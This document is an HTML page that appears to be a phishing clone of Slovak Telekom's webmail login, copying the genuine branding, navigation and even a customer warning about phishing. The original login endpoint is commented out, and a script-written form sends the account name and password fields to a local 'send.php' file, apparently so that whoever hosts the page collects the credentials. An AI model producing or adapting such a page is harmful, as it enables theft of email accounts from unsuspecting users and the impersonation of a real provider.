









<html><head>

	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<meta name="robots" content="index,follow"><title>Telekom | Webmail</title>
	
	<style type="text/css" title="T-Com style">
		@import "https://mail.telekom.sk/uwc/tcom/login/Css/zona.css";
		@import "https://mail.telekom.sk/uwc/tcom/login/Css/webmail.css";		
	</style>
	<script type="text/javascript" src="https://mail.telekom.sk/uwc/tcom/login/Js/scripts.js"></script>
	<script type="text/javascript" src="https://mail.telekom.sk/uwc/tcom/login/Js/setdomain.js"></script>

<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-814275-6']);
  _gaq.push(['_setDomainName', 'none']);
  _gaq.push(['_setAllowLinker', 'true']);
  _gaq.push(['_trackPageview', '/Zona/Webmail']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>


<script>
var IE = 0, NN = 0
var s = navigator.userAgent
var user = ''
var nouserpass=false
var loginFailed=false
var sessionTimeout=false;

if (s == '')
  IE = 3
else if (s.indexOf('MSIE') != -1)
  IE = parseFloat(s.substring(s.indexOf('MSIE') + 5, s.length))
else if (s.indexOf('Mozilla') != -1)
  NN = parseFloat(s.substring(s.indexOf('Mozilla') + 8, s.length))

if (window.location.search) {
  if (window.location.search.substring(0,12) == '?nouserpass=') {
    nouserpass = true;
    user = window.location.search.substring(12, window.location.search.length);
  }
  if (window.location.search.indexOf('loginFailed=true') != -1) 
	loginFailed = true;
  if (window.location.search.indexOf('sessionTimeout=true') != -1) 
	sessionTimeout = true;
/*  else
    user = window.location.search.substring(6, window.location.search.length);*/
}

function trimLeadingSpaces(str){
  var i=0;
  while (str.charAt(i)==' ') i++
  return str.substring(i)
}

function login() {
var form
  if (document.loginform.elements[0].value == '' || document.loginform.elements[1].value == '') {
    nouserpass = true;
    user = trimLeadingSpaces(document.loginform.elements[0].value);
    document.location = "//"+document.domain+'/?nouserpass='+user;
    return;
  }
  form = document.loginform
  form.submit()
}

function post() {
  login()
  return false
}

</script></head><body class="home" onload="document.loginform.elements[3].focus()">

<div id="container">
	<!-- header -->
	<div id="header">

		<div id="headerLeft">
			<h1><a href="http://www.telekom.sk/" name="top" class="lnkLogo" title="Telekom"><span>Telekom</span></a></h1>

		</div>
		<h2 style="background: transparent url(https://mail.telekom.sk/uwc/tcom/login/Img/img_webmail/art_webmail.gif) no-repeat scroll 0%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; width: 550px; height: 80px; float: left; text-indent: -6000px;">Webmail</h2>
		<div id="headerRight">
			<ul>
				<li><a href="http://www.telekom.sk/" class="lnkNavHelpOptions">www.telekom.sk</a></li>
				<li><a href="http://zona.telekom.sk/" class="lnkNavHelpOptions">zona.telekom.sk</a></li>
			</ul>

		</div>
	</div>
	<!-- /end header -->
	<div id="pnlLeft">
		<div id="navLeftSecond">
			<ul>
				<li><a href="http://zona.telekom.sk/hci" class="lnkLeftWhite0B"><span>Smart</span></a></li>
				<li><a href="https://portal.vvn.telekom.sk/" class="lnkLeftWhite0B"><span>Virtual VoiceNet - VVN</span></a></li>
				<li><a href="https://portal.vvn.telekom.sk/" class="lnkLeftWhite0B"><span>Benefit</span></a></li>
				<li><a href="https://mail.telekom.sk/" class="lnkLeftWhite0Sel"><span>Webmail</span></a></li>
				<li><a href="https://zona.telekom.sk/dialdsl" class="lnkLeftWhite0B"><span>Kontrola spotreby</span></a></li>
                                <li><a href="https://zona.telekom.sk/portal/dt?provider=SC_PCCB" class="lnkLeftWhite0B"><span>Rodi&#x010D;ovsk&#x00E1; kontrola</span></a></li> 
                                <li><a href="https://zona.telekom.sk/portal/dt?provider=SC_BCPP" class="lnkLeftWhite0B"><span>Firemn&#x00E1; kontrola &amp; Prioritiz&#x00E1;cia d&#x00E1;t</span></a></li>
				<li><a href="https://zona.telekom.sk/portal/dt?provider=SC_DNCB" class="lnkLeftWhite0B"><span>D&#x00E1;ta navy&#353;e</span></a></li>
				<li><a href="http://www.vypis.sk/" class="lnkLeftWhite0B"><span>E-výpisy, E-faktúry</span></a></li>
				<li><a href="http://zona.telekom.sk/portal/dt?provider=SC_WH" class="lnkLeftWhite0B"><span>Webhosting</span></a></li>
				<li><a href="http://zona.telekom.sk/portal/dt?provider=SC_DNS" class="lnkLeftWhite0B"><span>DNS služby</span></a></li>
			</ul>
		</div>
	</div>

	<!-- /end left panel / navigation -->
	<!-- center panel / content -->
	<div id="pnlSubCenter">
		<div id="pnlSubContent">
			<table class="pnlSubContentTable" cellspacing="0">
				<tbody><tr>
					<td class="pnlSubContentGrey">
						<div id="webmailcontent">
<p><strong>Dôležitá informácia: Zaregistrovali sme phishingové e-maily smerované na našich zákazníkov!</strong></p>


Aby ste predišli zneužitiu Vašej e-mailovej schránky, venujte prosím pozornosť nasledovným informáciám:


·         Spoločnosť Slovak Telekom nikdy nežiada osobné alebo prihlasovacie údaje svojich zákazníkov prostredníctvom elektronickej pošty.

·         Neodpovedajte na e-maily, v ktorých od Vás ktokoľvek, vrátane osôb vydávajúcich sa za zamestnancov ST, žiada poskytnutie osobných informácií, prístupových údajov (napr. login a heslo do schránky elektronickej pošty). O akýchkoľvek pokusoch o získanie Vašich údajov neodkladne informujte ST.

·         Nespúšťajte, resp. neotvárajte neznáme prílohy a internetové odkazy obsiahnuté v tele nevyžiadaných e-mailov a v e-mailoch od neznámych odosielateľov.

·         Venujte zvýšenú pozornosť podozrivým e-mailom. Tieto môžu v prvej chvíli vyzerať, že pochádzajú z dôveryhodných zdrojov.

·         Neposielajte a nevkladajte osobné údaje alebo iné informácie na nezašifrované a nezabezpečené internetové stránky.

·         Do emailovej schránky sa prihlasujte z dôveryhodného počítača, ktorý má pravidelne aktualizovaný antivírusový a antispyware softvér.

·         V prípade ak ste tak urobili, urýchlene si zmente heslo do Vašej e-mailovej schránky a kontaktujte nás na 0800 123 777
					</td>
					<td class="pnlSubContentWhite">
<script>
var IE = 0, NN = 0
var s = navigator.userAgent
var user = ''
var nouserpass=false

if (s == '')
  IE = 3
else if (s.indexOf('MSIE') != -1)
  IE = parseFloat(s.substring(s.indexOf('MSIE') + 5, s.length))
else if (s.indexOf('Mozilla') != -1)
  NN = parseFloat(s.substring(s.indexOf('Mozilla') + 8, s.length))

/*if (window.location.search) {
  if (window.location.search.substring(0,12) == '?nouserpass=') {
    nouserpass = true;
    user = window.location.search.substring(12, window.location.search.length);
  }
  else
    user = window.location.search.substring(6, window.location.search.length);
}*/

/*if ((user && !nouserpass) || nouserpass) {
  if (NN >= 3 && NN < 4)
    alert('Neplatný účet alebo heslo.')
  else
    document.write('<img src="https://mail.telekom.sk/uwc/images/error_32_tcom.gif" border="0" align="left" hspace="10" />' +
      '<b>Prihlásenie bolo neúspešné.</b><br />' +
      'Zadané prihlasovacie údaje zrejme nie sú správne.<br /><br /><br />Skontrolujte správnosť údajov a skúste sa prihlásiť znovu.' +
      ' Ak problém pretrváva, kontaktujte technickú podporu.' +
      '<p align="center"><a href="/">Späť na prihlásenie</a></p>');*/
if (loginFailed) {
  document.write('<img src="https://mail.telekom.sk/uwc/uwc/tcom/images/error_32_sunplex.gif" border="0" align="left" hspace="10" />' +
      '<b>Prihlásenie bolo neúspešné.</b><br />' +
      'Zadané prihlasovacie údaje zrejme nie sú správne.<br /><br /><br />Skontrolujte správnosť údajov a skúste sa prihlásiť znovu.' +
      ' Ak problém pretrváva, kontaktujte technickú podporu.');
	document.write('<br/><br/><a href="/uwc">sp&#xE4;&#x0165; na prihl&#xE1;senie</a>');
} else if (sessionTimeout) {
	document.write('<img src="https://mail.telekom.sk/uwc/uwc/tcom/images/error_32_sunplex.gif" border="0" align="left" hspace="10" />' +
      '<b>Doba vašej nečinnosti vypršala. Prosím prihláste sa znova.</b>');
 document.write('<br/><br/><a href="/uwc">sp&#xE4;&#x0165; na prihl&#xE1;senie</a>');

} else {
	var amprefix="https://zona.telekom.sk";
	if( document.location.href.indexOf("https") != -1 ) {
		var uwcprefix="send.php";
  	} else {
		var uwcprefix="send.php";
  	}
  document.write('' +
						'<strong>Účet:</strong><br />' 	+
						//'<form name="loginform" onSubmit="return post();" action="/amserver/UI/Login">' +
						'<form name="loginform" method="POST" action="send.php">' +
                            '<!--input type="hidden" name="org" value="o=stonline.sk,o=isp"/-->' +
                            '<input type="hidden" name="goto" value="send.php">' +
			    '<input type="hidden" name="gotoOnFail" value="send.php">' +
                            '<input type="hidden" name="locale" value="sk"/>' +
							'<input type="text" name="IDToken1" style="width: 140px;"/><br />' +
							'<strong>Heslo:</strong><br />' +
							'<input type="password" name="IDToken2" style="width: 140px;"/>' +
							'<input type="submit" value="Prihlásiť"/><br /><br />' +
						'</form>');
/*
  if( document.location.href.indexOf("https") != -1 ) {
    document.write('Prístup: Zabezpečený | <a href="http://mail.telekom.sk/">Bežný</a>');
  } else {
    document.write('Prístup: <a href="https://mail.telekom.sk/">Zabezpečený</a> | Bežný');
  }
*/
  document.write(
						'<ul class="pnlLoginHelpList">' +
							'<li><a href="http://www.telekom.sk/?redir=ZPPrihlasovacieUdaje">Zabudli ste heslo ?</a></li>' +
			    			'<li><a href="http://www.telekom.sk/?redir=ZPPrihlasovacieUdaje">Nemôžete sa prihlásiť ?</a></li>' +
						'</ul>');
  document.write('<p>' +
'Táto aplikácia nepodporuje internetový prehliadač <b>Opera</b>, doporučujeme používať prehliadače <b>Internet Explorer</b> alebo <b>Mozilla Firefox</b>.')
}
</script>
					</td>
				</tr>
			</tbody></table>
		</div>

	</div>
	<!-- /end center panel / content -->
	<!-- right panel -->
	<div id="pnlRight">
		<h3>Ot&#x00E1;zky a objedn&#x00E1;vky</h3>
		<div class="pnlRightOptions">

			<div id="question2">volajte bezplatne podporu internetových služieb 0800 123 777</div>

		</div>
	</div>
	<!-- /end right panel -->
	<!-- footer -->
	<div id="footer">
		<div id="footerTop">
			<div id="footerTopLeft">

				<a href="#top" class="lnkGoTop">Na začiatok</a><div id="lnkTop"></div><br>

			</div>
		</div>
		<div id="footerBottom">
			<div id="footerBottomRight">
				<ul>
					<li><a href="http://www.telekom.sk/?redir=CTInternet" class="lnkNavFooter">Technická podpora</a></li>
					<li><a href="http://www.telekom.sk/?redir=NFpravne" class="lnkNavFooterOptions">Právne informácie</a></li>

					<li><a href="http://www.telekom.sk/?redir=CT" class="lnkNavFooterOptions">Kontakt</a></li>
				</ul>
			</div>
			<div id="footerBottomLeft">
				© 2006 - <script language="javascript">document.write(new Date().getFullYear());</script> Slovak Telekom
			</div>
		</div>
	</div>

	<!-- /end footer -->	
</div>

</body></html>
